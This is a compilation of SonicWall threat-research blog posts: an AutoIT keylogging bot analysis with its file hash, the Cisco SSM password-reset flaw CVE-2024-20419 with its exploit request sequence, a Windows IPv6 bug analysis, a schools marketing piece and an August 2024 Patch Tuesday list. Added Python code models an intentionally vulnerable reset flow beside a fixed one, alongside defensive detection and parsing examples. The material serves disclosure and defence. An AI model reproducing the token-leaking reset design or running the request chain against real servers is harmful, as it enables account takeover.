
Remediation Recommendations

Given the severe consequences of this vulnerability and reports of threat actors attempting to exploit it in the wild, users are strongly encouraged to upgrade their FastAdmin instances to version 1.3.4.20220530, which addresses the vulnerability.


AutoIT Bot Targets Gmail Accounts First

Summary

This week, the SonicWall Capture Labs threat research team observed an AutoIT-compiled executable that attempts to open Gmail login pages in Microsoft Edge, Google Chrome and Mozilla Firefox. It can read clipboard data, capture keystrokes, run as different users, and restart or shut down the system. The sample can also detect debuggers and block user input when one is found, and it can inject keyboard and mouse events. Be cautious when running files of unknown origin or with vague names such as “File.exe”. SonicWall customers are protected via the “MalAgent.AutoITBot” signature in the daily update feed.

Technical Analysis

Reviewing the sample with the Detect-It-Easy (DIE) tool identifies it as an AutoIT-compiled executable. Note that the original name was “File.exe”.

Figure 1: DIE Sample detection

Several libraries, including four separate networking libraries, are imported by ordinal only, with no function names; this hides the imported functions from casual inspection and can be seen in the DIE output in Figure 2.

Figure 2: Obfuscated libraries

Using the AutoITExtractor tool we can extract the script shown in Figure 3. It contains cleartext commands to find and launch each browser on the Google sign-in page (accounts.google.com).

Figure 3: Extracted script contents

Static analysis with a disassembler shows no hardcoded addresses known to be malicious. While the script has each browser open the Google accounts page, it also contains generic login links for Facebook, Reddit and other major social media sites. While the browsers launch, a separate function sets up a listening socket if the environment checks pass and connectivity has been established, as shown in Figure 4.

Figure 4: Socket option setup

If the socket setup fails, the malware calls the standard WSAGetLastError Windows API, as observed during dynamic analysis (Figure 5).

Figure 5: Socket bind operation (failed)

When the browsers are run, they create multiple processes using the following command line structure:

Figure 6: Browser command line commands

The first process creates a hidden, separate page in Firefox, while the second attempts to open the socket.

Once a connection is made, the keylogging, screen capture and file enumeration functions run. This behavior was not observed during testing, however, as no C2 server ever connected.

SonicWall Protections

To ensure SonicWall customers are protected against this threat, the following signature has been released:

  • MalAgent.AutoITBot

IOCs

File.exe

6a4d5fa1f240b1ea51164de317aa376bbc1bbddeb57df23238413c5c21ca9db0

Cisco Smart Software Manager On-Prem Account Takeover

Overview

The SonicWall Capture Labs threat research team became aware of an account takeover vulnerability in Cisco’s Smart Software Manager (SSM) On-Prem, assessed its impact and developed mitigation measures for the vulnerability. Identified as CVE-2024-20419 and given a maximum CVSS score of 10.0, this remotely exploitable vulnerability allows an unauthenticated attacker to change the password of any user account on the device, including the administrator. While it is uncertain whether the vulnerability is being actively exploited, publicly available proof-of-concept (PoC) code makes exploitation more likely. The vulnerability affects Cisco SSM On-Prem software version 8-202206 and earlier. Cisco advises upgrading to version 8-202212; there are no known workarounds.

Technical Overview

CVE-2024-20419 is a flaw in the one-time password (OTP) generation process of Cisco Smart Software Manager On-Prem. The vulnerability exists in the `/backend/reset_password/generate_code` endpoint. This endpoint is intended to let a user prove their identity before a password-reset authorization token is issued; however, the application includes the token in the response before OTP verification is complete. An attacker can therefore use the token without ever completing the OTP step, bypassing the check and resetting any user’s password, including an administrator’s.

Triggering the Vulnerability

Using the publicly available PoC code, we can see that triggering the vulnerability requires two web requests to the SSM: a GET followed by a POST. The GET request, seen in Figure 1, obtains the tokens required for the next request, an XSRF token and a session token.

Figure 1: Obtaining required tokens using GET request

With those tokens in hand, the vulnerability is triggered by sending a POST request to the vulnerable endpoint `/backend/reset_password/generate_code`, as seen in Figure 2. The vulnerable SSM returns the authentication token in the response, from which it can be parsed.

Figure 2: Constructing the POST request to trigger the vulnerability

Exploitation

To use the token obtained in the previous step, the attacker sends a request to the ‘backend/reset_password’ endpoint with the target username, the authentication token and a new password. Figure 3 demonstrates exploitation by chaining all three requests using the public PoC.
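
The bug is a logic flaw rather than a memory or injection bug, so the clearest way to see it is to model the reset flow twice. The following is an added example, not Cisco's code and not a description of its internals: a vulnerable flow in which generate_code returns the authorization token in its response, beside a fixed flow that only mints the token after the OTP has been verified and limits verification attempts. Out-of-band delivery of the OTP is stubbed with a dictionary so the legitimate path can be exercised offline; the six-digit OTP format and the attempt limit are choices of the example.

```python
import hashlib
import hmac
import secrets

DELIVERED = {}   # stand-in for e-mail/SMS delivery, recorded so the legitimate path can run


def deliver_out_of_band(username, otp):
    DELIVERED[username] = otp


class ResetFlowVulnerable:
    """Shape of the flaw described above: generate_code hands back the reset token
    in the response body, so the OTP step can simply be skipped."""

    def __init__(self, users):
        self.users = dict(users)
        self.tokens = {}

    def generate_code(self, username):
        otp = f"{secrets.randbelow(10**6):06d}"
        token = secrets.token_hex(16)
        self.tokens[username] = token
        deliver_out_of_band(username, otp)
        return {"status": "otp_sent", "auth_token": token}   # the leak

    def reset_password(self, username, token, new_password):
        if not hmac.compare_digest(self.tokens.get(username, ""), token):
            return False
        self.users[username] = new_password
        return True


class ResetFlowFixed:
    """Token is minted only after the OTP is verified; the response never carries a secret."""
    MAX_ATTEMPTS = 5

    def __init__(self, users):
        self.users = dict(users)
        self.pending = {}
        self.tokens = {}

    def generate_code(self, username):
        otp = f"{secrets.randbelow(10**6):06d}"
        self.pending[username] = {"otp": hashlib.sha256(otp.encode()).hexdigest(), "attempts": 0}
        deliver_out_of_band(username, otp)
        return {"status": "otp_sent"}                        # nothing usable by a caller

    def verify_otp(self, username, otp):
        entry = self.pending.get(username)
        if entry is None or entry["attempts"] >= self.MAX_ATTEMPTS:
            return None
        entry["attempts"] += 1
        if not hmac.compare_digest(entry["otp"], hashlib.sha256(otp.encode()).hexdigest()):
            return None
        del self.pending[username]                           # single use
        token = secrets.token_hex(16)
        self.tokens[username] = token
        return token

    def reset_password(self, username, token, new_password):
        if not hmac.compare_digest(self.tokens.get(username, ""), token):
            return False
        del self.tokens[username]                            # token is single use too
        self.users[username] = new_password
        return True
```

The attempt limit, not the hash, is what protects a six-digit OTP; a real implementation also expires the pending entry after a few minutes. The property worth testing in a review is the negative one: the generate_code response must contain nothing that reset_password accepts.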

SonicWall Protections

To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signatures have been released:

  • IPS: 20223 Cisco SSM Admin Password Reset

Remediation Recommendations

Per the Cisco advisory, customers should upgrade to Cisco SSM version 8-202212. Cisco reports no other workarounds, so the upgrade is required. Industry best practices such as IP allowlisting, network segmentation and removing Internet-facing access reduce overall risk but do not mitigate the issue.


Understanding CVE-2024-38063: How SonicWall Prevents Exploitation

Contributing Researchers: Soumy Das and Hasib Vhora

Overview

CVE-2024-38063 is a critical remote code execution vulnerability in the Windows IPv6 stack with a CVSS score of 9.8. This zero-click, wormable flaw lets attackers execute arbitrary code remotely via specially crafted IPv6 packets, potentially leading to full system compromise. It affects Windows 10, Windows 11 and Windows Server. Microsoft has released patches, and it is essential to apply them promptly. Given the critical nature of the vulnerability and the likelihood of exploitation in the wild, SonicWall has proactively added mitigations to its firewall and RTDMI products to cover systems where the patch has not yet been applied.

A Chinese researcher from Cyber KunLun discovered the vulnerability, and Microsoft publicly disclosed it in its August 2024 Patch Tuesday release. Due to the simplicity with which an exploit could be crafted, Microsoft has urged users to apply the available patches immediately. Some security experts have incorrectly advised disabling IPv6. While Microsoft clarifies that disabling IPv6 can mitigate the vulnerability, it is not recommended due to potential issues with Windows functionality. Instead, Microsoft advises patching systems immediately.

SonicWall Protections

The SonicWall firewall protects against CVE-2024-38063 by blocking malicious IPv6 fragmented packets by default. This protection applies regardless of whether additional security services are configured, including whether deep packet inspection (DPI) is enabled or disabled or whether the firewall is configured to allow smaller IPv6 packets. The firewall drops the critical packet involved in the exploit due to its fragment reassembly logic, which ensures that the packet never reaches the victim machine. If an exploitation attempt is made, a log entry reading “IPv6 fragment was dropped” may be created, depending on the firewall’s configuration.
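Since the drop is logged only as “IPv6 fragment was dropped”, a SOC needs something that separates a stray fragment from an attempt to reach many hosts. The sliding-window aggregation below is an added example, not SonicWall code; the message text is from the article, but the surrounding syslog-style fields are an assumed layout rather than the firewall's real log format, and the threshold and window are tuning choices.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed syslog-style lines.  Only the msg text "IPv6 fragment was dropped" comes from
# the article; the field layout is assumed and should be adapted to the real log format.
SAMPLE_FW_LOG = """\
2024-08-20T12:00:00Z fw1 src=2001:db8::10 dst=2001:db8::50 msg="IPv6 fragment was dropped"
2024-08-20T12:00:01Z fw1 src=2001:db8::10 dst=2001:db8::50 msg="IPv6 fragment was dropped"
2024-08-20T12:00:02Z fw1 src=2001:db8::10 dst=2001:db8::51 msg="IPv6 fragment was dropped"
2024-08-20T12:00:03Z fw1 src=2001:db8::10 dst=2001:db8::52 msg="IPv6 fragment was dropped"
2024-08-20T12:00:05Z fw1 src=2001:db8::77 dst=2001:db8::50 msg="Connection opened"
2024-08-20T12:30:00Z fw1 src=2001:db8::99 dst=2001:db8::50 msg="IPv6 fragment was dropped"
"""

FW_RE = re.compile(r'^(?P<ts>\S+) \S+ src=(?P<src>\S+) dst=(?P<dst>\S+) msg="(?P<msg>[^"]*)"')
DROP_MSG = "IPv6 fragment was dropped"


def fragment_drop_alerts(log_text, threshold=3, window=timedelta(minutes=5)):
    """Return {src: (drops, distinct_destinations)} for every source that produced at least
    `threshold` fragment drops inside any `window`-long interval.  The tuple reports the
    busiest interval seen for that source."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        m = FW_RE.match(line)
        if not m or m["msg"] != DROP_MSG:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events[m["src"]].append((ts, m["dst"]))

    alerts = {}
    for src, evs in events.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):
            # advance the window start until every event in [start, end] fits in `window`
            while evs[end][0] - evs[start][0] > window:
                start += 1
            count = end - start + 1
            if count >= threshold:
                dsts = {dst for _, dst in evs[start:end + 1]}
                if src not in alerts or count > alerts[src][0]:
                    alerts[src] = (count, len(dsts))
    return alerts


if __name__ == "__main__":
    for src, (count, ndst) in fragment_drop_alerts(SAMPLE_FW_LOG).items():
        print(f"{src}: {count} fragment drops toward {ndst} destination(s)")
```

The distinct-destination count is the part worth watching for a wormable bug: one dropped fragment toward one host is ordinary network noise, while a burst from one source across several internal addresses is the pattern that warrants checking whether those destinations are patched.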

Given the wormable nature of this vulnerability, there is a risk that it could be embedded in binaries sent over the network for later exploitation. We’ve strengthened our RTDMI sandboxing solution to detect and block Windows or Linux binaries carrying this exploit, safeguarding our customers. This added layer of protection is crucial for identifying and preventing lateral movement and post-exploitation activities by threat actors, ensuring robust security even if some systems remain unpatched.

The Patch

By doing basic patch diffing with the help of Diaphora on the old and new versions of the tcpip.sys driver in Microsoft Windows, it is possible to determine that the patch was added to the Ipv6pProcessOptions function.

The additional conditional logic in the updated version introduces checks before executing IppSendErrorList. The vulnerability takes advantage of an out-of-bounds (OOB) write by sending malformed IPv6 packets. It forces packets to be written to an error list called IppSendErrorList to obtain the correct conditions. The new checks only add packets to the list after the data is validated; otherwise, the code only sends an error without adding the packets to the list memory structure. The patch prevents unintended behavior or exploitation by ensuring that the functions `IppSendError` or `IppSendErrorList` are only called under appropriate conditions, reducing the risk of incorrect or malicious data being processed. This indicates that the vulnerable code likely still exists but is more complicated or potentially impossible to leverage.
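The pattern the patch enforces, validate an option's declared length against the header that contains it before doing any bookkeeping on the packet, is the general rule for parsing IPv6 extension-header options. The parser below is an added illustration of that rule for the Hop-by-Hop Options header as laid out in RFC 8200; it is written for this article and is not the tcpip.sys code, does not reproduce Microsoft's internal structures, and makes no claim about which specific option field the real bug involves. The sample headers are constructed, and the option type 0x1e is one of the values RFC 4727 reserves for experimentation.

```python
# IPv6 Hop-by-Hop Options header (RFC 8200 section 4.3):
#   octet 0      Next Header
#   octet 1      Hdr Ext Len, in 8-octet units, not counting the first 8 octets
#   octets 2..   TLV options: type(1) [len(1) data(len)] ; type 0 (Pad1) has no length byte
PAD1 = 0
PADN = 1


def parse_hop_by_hop(buf):
    """Return (next_header, [(option_type, data), ...]) for a well-formed header.

    Raises ValueError the moment a length field would run past the header, so a
    malformed packet is rejected before any further processing or error bookkeeping."""
    if len(buf) < 8:
        raise ValueError("truncated header: need at least 8 octets")
    next_header, hdr_ext_len = buf[0], buf[1]
    hdr_len = (hdr_ext_len + 1) * 8
    if hdr_len > len(buf):
        raise ValueError(f"hdr_ext_len claims {hdr_len} octets, only {len(buf)} present")

    options = []
    off = 2
    while off < hdr_len:
        opt_type = buf[off]
        if opt_type == PAD1:              # single-octet padding, no length field
            off += 1
            continue
        if off + 2 > hdr_len:
            raise ValueError(f"option at offset {off} has no length byte inside the header")
        opt_len = buf[off + 1]
        end = off + 2 + opt_len
        if end > hdr_len:                 # the bounds check: declared length must fit the header
            raise ValueError(f"option type {opt_type} at offset {off} declares {opt_len} data "
                             f"octets, overrunning the header by {end - hdr_len}")
        options.append((opt_type, bytes(buf[off + 2:end])))
        off = end
    return next_header, options


def build_hop_by_hop(next_header, options):
    """Construct a header from (type, data) options, padding to an 8-octet multiple."""
    body = b"".join(bytes([t, len(d)]) + d for t, d in options)
    pad = (-(2 + len(body))) % 8
    if pad == 1:
        body += bytes([PAD1])
    elif pad > 1:
        body += bytes([PADN, pad - 2]) + bytes(pad - 2)
    hdr_ext_len = (2 + len(body)) // 8 - 1
    return bytes([next_header, hdr_ext_len]) + body


def is_well_formed(buf):
    try:
        parse_hop_by_hop(buf)
        return True
    except ValueError:
        return False


# Constructed inputs: a valid header carrying one 4-octet experimental option (next header 59 =
# No Next Header), and a copy whose option length byte has been raised past the header end.
GOOD = build_hop_by_hop(59, [(0x1e, b"\xaa\xbb\xcc\xdd")])
BAD = bytes(bytearray(GOOD[:3]) + bytearray([0xff]) + bytearray(GOOD[4:]))

if __name__ == "__main__":
    print("good:", parse_hop_by_hop(GOOD))
    print("bad accepted?", is_well_formed(BAD))
```

The point of ordering the checks this way is the one the patch makes: nothing about the packet is recorded, queued or reported until its lengths are known to be consistent, so a bad length can only ever produce a rejection, never a write based on the unvalidated value.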

How SonicWall Safeguards Today’s Classrooms

As with every other facet of our lives, technology has dramatically revolutionized the world of education. In particular, the how and where learning occurs has been rapidly transformed and these changes have only accelerated. While the use of smartphones and laptops in classroom environments may have been frowned upon just a decade earlier, K-12 education spaces are now increasingly embracing remote and hybrid learning models and using technology to aid in curriculum. With these changes have come unprecedented challenges on the cybersecurity side that demand holistic yet cost-effective solutions to protect and enable students and faculty.

Let’s look at the challenges faced in the K-12 environment and where solutions across SonicWall’s ecosystem can enable a layered security approach to connect and secure modern learning.

Lack of Cybersecurity Expertise and Limited Resources

K-12 schools can be especially vulnerable to threat actors who, with increasing sophistication, are targeting schools. As threats become more advanced and persistent, rising security costs often plague K-12 organizations that are already struggling with limited resources. Many school districts have only a few people who are responsible for the IT needs of hundreds of students and faculty. These IT teams often lack the essential cybersecurity expertise needed to configure and maintain security posture across the many devices and accounts accessed across school districts.

Increased Attack Surfaces

As schools have pivoted to quickly adopting new technologies and more devices to support remote learning, attack surfaces have continued to increase. Chromebooks are taken to and from schools. Individual students, teachers and parents are simultaneously creating accounts to access school resources and networks. Substitute teachers need to be granted quick access to networks, resources and accounts frequently. This expansion of attack surfaces is inevitably leading to unauthorized access to school networks, insufficient visibility into network traffic and potential breaches or ransomware attacks.

Supporting Both In-Person and Virtual Learning

As schools have transitioned to supporting both in-person and virtual learning environments, the connectivity and security requirements needed to enable both have become increasingly complex. For students to learn on campuses, administrators need to juggle the responsibilities of ensuring reliable and fast wireless access to the internet and any school resources. At the same time, for virtual learning students and faculty need to remotely access resources while also being kept safe from threats and inappropriate content off school networks. Managing and monitoring both users that are on campus and remote is vital, yet difficult, with many security and networking solutions being siloed.

Compliance with CIPA

The Children’s Internet Protection Act (CIPA) requires schools that receive federal E-rate discounts to meet several requirements. At the most basic level, CIPA requires the implementation of a content filtering tool to block access to obscene content online. Today, the many devices that are taken to and from campus present a challenge as traditional network level content filtering services are often inadequate and are needed at the endpoint as well.

SonicWall Protects Schools at Every Layer of Security

Given these challenges, it’s clear that a layered security approach is key to securing K-12 environments and enabling modern learning. Siloed tools are no longer adequate and may eventually become a liability rather than an asset for IT teams to manage. SonicWall partners with school districts to provide a layered security approach to ensure the defenses needed in today’s threat landscape while also enabling secure access to resources anywhere and anytime. SonicWall’s ecosystem includes cost-effective and accessible security and networking solutions at all layers.

From firewalls, endpoint security, switches, access points and MDR offerings, here is how SonicWall’s products provide a layered defense to enable learning while protecting faculty, students and staff whether they’re learning on campus or from home:

  • SonicWall’s Next-Generation Firewalls (NGFWs) come in a variety of scalable options that provide the security, control and visibility needed to maintain an effective cybersecurity posture all at a cost that protects limited budgets.
  • At the endpoint, Capture Client is an easy-to-deploy, endpoint security agent powered by a dual-engine that provides a layered defense with protection, detection and response tools bundled in one agent.
  • SonicWall Managed Extended Detection and Response (XDR) is our solution that provides a 24/7/365 SOC staffed by cybersecurity experts to manage tools and critical alerts on any day at any hour of the day. This service provides comprehensive protection and responses against a wide range of cyber threats that schools can be especially vulnerable to and alleviates pressure on already strained IT teams with top-of-line security experts.
  • With SonicWave Access Points (APs), schools can ensure fast and secure internet access across campus, facilitating seamless in-person learning experiences. These provide performance, range, reliability and built-in security features for an enhanced learning experience as the number of connected devices expands in a K-12 environment.
  • SonicWall Switches enable high-speed switching which secures connectivity for modern classrooms. They seamlessly integrate with the SonicWall ecosystem to provide a unified security posture while ensuring the best user experiences.
  • Both SonicWall NGFWs and Capture Client have content filtering features bundled seamlessly without additional cost to make sure your security infrastructure is compliant with CIPA regulations. For devices that are taken home, Capture Client enables content filtering at the endpoint to restrict access to dangerous websites and maintain compliance both in and out of schools.

SonicWall: Your Partner in Learning

The integration of technology has fundamentally changed the learning landscape. These changes bring both opportunities and challenges for K-12 institutions. As schools implement hybrid and remote learning models, they face increased cybersecurity risks that demand robust, cost-effective solutions. By partnering with SonicWall and taking advantage of our comprehensive suite of security products, school district administrators are empowered to create a continuously safe, flexible and conducive digital learning environment, ensuring that students and faculty are protected and supported no matter where they are learning from.

Learn more about SonicWall’s K-12 solutions here.

Microsoft Security Bulletin Coverage For August 2024

Overview

Microsoft’s August 2024 Patch Tuesday has 87 vulnerabilities, 36 of which are Elevation of Privilege vulnerabilities. The SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of August 2024 and has produced coverage for ten of the reported vulnerabilities.

Vulnerabilities with Detections


CVE | CVE Title | Signature
CVE-2024-38106 | Windows Kernel Elevation of Privilege Vulnerability | ASPY 6995 Exploit-exe exe.MP_399
CVE-2024-38125 | Kernel Streaming WOW Thunk Service Driver Elevation of Privilege Vulnerability | ASPY 6996 Exploit-exe exe.MP_400
CVE-2024-38141 | Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability | ASPY 6997 Exploit-exe exe.MP_401
CVE-2024-38144 | Kernel Streaming WOW Thunk Service Driver Elevation of Privilege Vulnerability | ASPY 6998 Exploit-exe exe.MP_402
CVE-2024-38147 | Microsoft DWM Core Library Elevation of Privilege Vulnerability | ASPY 6999 Exploit-exe exe.MP_403
CVE-2024-38148 | Windows Secure Channel Denial of Service Vulnerability | ASPY 593 Exploit-exe exe.MP_404
CVE-2024-38150 | Windows DWM Core Library Elevation of Privilege Vulnerability | ASPY 594 Exploit-exe exe.MP_405
CVE-2024-38178 | Scripting Engine Memory Corruption Vulnerability | IPS 4483 Scripting Engine Memory Corruption (CVE-2024-38178)
CVE-2024-38193 | Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability | ASPY 595 Exploit-exe exe.MP_406
CVE-2024-38196 | Windows Common Log File System Driver Elevation of Privilege Vulnerability | ASPY 596 Exploit-exe exe.MP_407
CVE-2024-38063 | Windows TCP/IP Remote Code Execution Vulnerability | RTDMI

Release Breakdown

The vulnerabilities can be classified into the following categories:

For August there are seven critical, 79 important and one moderate vulnerabilities.

2024 Patch Tuesday Monthly Comparison

Microsoft tracks vulnerabilities that are being actively exploited at the time of discovery and those that have been disclosed publicly before the patch Tuesday release for each month. The above chart displays these metrics as seen each month.

Release Detailed Breakdown

Denial of Service Vulnerabilities

CVE | CVE Title
CVE-2024-38126 | Windows Network Address Translation (NAT) Denial of Service Vulnerability
CVE-2024-38132 | Windows Network Address Translation (NAT) Denial of Service Vulnerability
CVE-2024-38145 | Windows Layer-2 Bridge Network Driver Denial of Service Vulnerability
CVE-2024-38146 | Windows Layer-2 Bridge Network Driver Denial of Service Vulnerability
CVE-2024-38148 | Windows Secure Channel Denial of Service Vulnerability
CVE-2024-38168 | .NET and Visual Studio Denial of Service Vulnerability

Elevation of Privilege Vulnerabilities

CVE | CVE Title
CVE-2024-21302 | Windows Secure Kernel Mode Elevation of Privilege Vulnerability
CVE-2024-29995 | Windows Kerberos Elevation of Privilege Vulnerability
CVE-2024-38084 | Microsoft OfficePlus Elevation of Privilege Vulnerability
CVE-2024-38098 | Azure Connected Machine Agent Elevation of Privilege Vulnerability
CVE-2024-38106 | Windows Kernel Elevation of Privilege Vulnerability
CVE-2024-38107 | Windows Power Dependency Coordinator Elevation of Privilege Vulnerability
CVE-2024-38109 | Azure Health Bot Elevation of Privilege Vulnerability
CVE-2024-38117 | NTFS Elevation of Privilege Vulnerability
CVE-2024-38125 | Kernel Streaming WOW Thunk Service Driver Elevation of Privilege Vulnerability
CVE-2024-38127 | Windows Hyper-V Elevation of Privilege Vulnerability
CVE-2024-38133 | Windows Kernel Elevation of Privilege Vulnerability
CVE-2024-38134 | Kernel Streaming WOW Thunk Service Driver Elevation of Privilege Vulnerability
CVE-2024-38135 | Windows Resilient File System (ReFS) Elevation of Privilege Vulnerability
CVE-2024-38136 | Windows Resource Manager PSM Service Extension Elevation of Privilege Vulnerability
CVE-2024-38137 | Windows Resource Manager PSM Service Extension Elevation of Privilege Vulnerability
CVE-2024-38141 | Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability
CVE-2024-38142 | Windows Secure Kernel Mode Elevation of Privilege Vulnerability
CVE-2024-38143 | Windows WLAN AutoConfig Service Elevation of Privilege Vulnerability
CVE-2024-38144 | Kernel Streaming WOW Thunk Service Driver Elevation of Privilege Vulnerability
CVE-2024-38147 | Microsoft DWM Core Library Elevation of Privilege Vulnerability
CVE-2024-38150 | Windows DWM Core Library Elevation of Privilege Vulnerability
CVE-2024-38153 | Windows Kernel Elevation of Privilege Vulnerability
CVE-2024-38162 | Azure Connected Machine Agent Elevation of Privilege Vulnerability
CVE-2024-38163 | Windows Update Stack Elevation of Privilege Vulnerability
CVE-2024-38184 | Windows Kernel-Mode Driver Elevation of Privilege Vulnerability
CVE-2024-38185 | Windows Kernel-Mode Driver Elevation of Privilege Vulnerability
CVE-2024-38186 | Windows Kernel-Mode Driver Elevation of Privilege Vulnerability
CVE-2024-38187 | Windows Kernel-Mode Driver Elevation of Privilege Vulnerability
CVE-2024-38191 | Kernel Streaming Service Driver Elevation of Privilege Vulnerability
CVE-2024-38193 | Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability
CVE-2024-38196 | Windows Common Log File System Driver Elevation of Privilege Vulnerability
CVE-2024-38198 | Windows Print Spooler Elevation of Privilege Vulnerability
CVE-2024-38201 | Azure Stack Hub Elevation of Privilege Vulnerability
CVE-2024-38202 | Windows Update Stack Elevation of Privilege Vulnerability
CVE-2024-38215 | Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability
CVE-2024-38223 | Windows Initial Machine Configuration Elevation of Privilege Vulnerability

Information Disclosure Vulnerabilities

CVE | CVE Title
CVE-2024-38118 | Microsoft Local Security Authority (LSA) Server Information Disclosure Vulnerability
CVE-2024-38122 | Microsoft Local Security Authority (LSA) Server Information Disclosure Vulnerability
CVE-2024-38123 | Windows Bluetooth Driver Information Disclosure Vulnerability
CVE-2024-38151 | Windows Kernel Information Disclosure Vulnerability
CVE-2024-38155 | Security Center Broker Information Disclosure Vulnerability
CVE-2024-38167 | .NET and Visual Studio Information Disclosure Vulnerability
CVE-2024-38206 | Microsoft Copilot Studio Information Disclosure Vulnerability
CVE-2024-38214 | Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability

Remote Code Execution Vulnerabilities

CVE | CVE Title
CVE-2024-38063 | Windows TCP/IP Remote Code Execution Vulnerability
CVE-2024-38114 | Windows IP Routing Management Snapin Remote Code Execution Vulnerability
CVE-2024-38115 | Windows IP Routing Management Snapin Remote Code Execution Vulnerability
CVE-2024-38116 | Windows IP Routing Management Snapin Remote Code Execution Vulnerability
CVE-2024-38120 | Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability
CVE-2024-38121 | Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability
CVE-2024-38128 | Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability
CVE-2024-38130 | Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability
CVE-2024-38131 | Clipboard Virtual Channel Extension Remote Code Execution Vulnerability
CVE-2024-38138 | Windows Deployment Services Remote Code Execution Vulnerability
CVE-2024-38140 | Windows Reliable Multicast Transport Driver (RMCAST) Remote Code Execution Vulnerability
CVE-2024-38152 | Windows OLE Remote Code Execution Vulnerability
CVE-2024-38154 | Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability
CVE-2024-38157 | Azure IoT SDK Remote Code Execution Vulnerability
CVE-2024-38158 | Azure IoT SDK Remote Code Execution Vulnerability
CVE-2024-38159 | Windows Network Virtualization Remote Code Execution Vulnerability
CVE-2024-38160 | Windows Network Virtualization Remote Code Execution Vulnerability
CVE-2024-38161 | Windows Mobile Broadband Driver Remote Code Execution Vulnerability
CVE-2024-38169 | Microsoft Office Visio Remote Code Execution Vulnerability
CVE-2024-38170 | Microsoft Excel Remote Code Execution Vulnerability
CVE-2024-38171 | Microsoft PowerPoint Remote Code Execution Vulnerability
CVE-2024-38172 | Microsoft Excel Remote Code Execution Vulnerability
CVE-2024-38173 | Microsoft Outlook Remote Code Execution Vulnerability
CVE-2024-38178 | Scripting Engine Memory Corruption Vulnerability
CVE-2024-38180 | SmartScreen Prompt Remote Code Execution Vulnerability
CVE-2024-38189 | Microsoft Project Remote Code Execution Vulnerability
CVE-2024-38195 | Azure CycleCloud Remote Code Execution Vulnerability
CVE-2024-38199 | Windows Line Printer Daemon (LPD) Service Remote Code Execution Vulnerability

Security Feature Bypass Vulnerability

CVE | CVE Title
CVE-2024-38213 | Windows Mark of the Web Security Feature Bypass Vulnerability

Spoofing Vulnerabilities

CVE | CVE Title
CVE-2024-37968 | Windows DNS Spoofing Vulnerability
CVE-2024-38108 | Azure Stack Hub Spoofing Vulnerability
CVE-2024-38166 | Microsoft Dynamics 365 Cross-site Scripting Vulnerability
CVE-2024-38177 | Windows App Installer Spoofing Vulnerability
CVE-2024-38197 | Microsoft Teams for iOS Spoofing Vulnerability
CVE-2024-38200 | Microsoft Office Spoofing Vulnerability
CVE-2024-38211 | Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability

Tampering Vulnerability

CVE | CVE Title
CVE-2024-38165 | Windows Compressed Folder Tampering Vulnerability